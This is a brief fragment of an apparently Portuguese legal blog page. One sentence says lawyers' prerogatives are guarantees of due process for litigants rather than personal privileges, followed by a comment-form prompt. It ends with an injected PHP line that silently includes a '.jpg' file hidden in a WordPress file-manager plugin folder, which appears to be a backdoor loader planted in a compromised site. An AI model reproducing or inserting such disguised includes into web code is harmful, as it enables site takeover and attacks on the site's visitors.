As prerrogativas não são privilégios dos advogados, mas, sim, garantia aos próprios jurisdicionados, para que seja respeitado o devido processo legal.

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

@include "wp-content/plugins/wp-file-manager/lib/php/editors/OnlineConvert/include/0168.jpg";